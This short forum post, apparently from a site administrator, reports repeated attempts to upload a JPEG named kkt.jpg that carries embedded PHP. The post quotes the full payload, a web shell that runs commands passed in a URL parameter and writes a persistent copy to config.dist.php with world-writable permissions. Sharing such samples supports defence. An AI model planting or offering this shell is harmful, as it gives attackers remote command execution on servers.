well someone is still trying to upload some images that has php code in them
kkt.jpg
ÿØÿþ?<?php
ob_clean();
echo"Hi Master!";
ini_set("max_execution_time",0);
passthru($_GET["cmd"]);
$in="<?php ob_clean();echo\"Hi Master!\";ini_set(\"max_execution_time\",0);passthru(\$_GET[\"cmd\"]);die;?>";
$sun=fopen("config.dist.php","w");
fputs($sun,$in);
fclose($sun);
chmod("config.dist.php",777);
die;
?>ÿà JFIF H H ÿÛ C ÿÛ CÿÀ ÿÄ ÿÄ ÿÄ ÿÄ ÿÚ ? ?ÁÇßÿÙ
I don't hope this can do any damage now after I installed 1.7.2 on his server (with mods)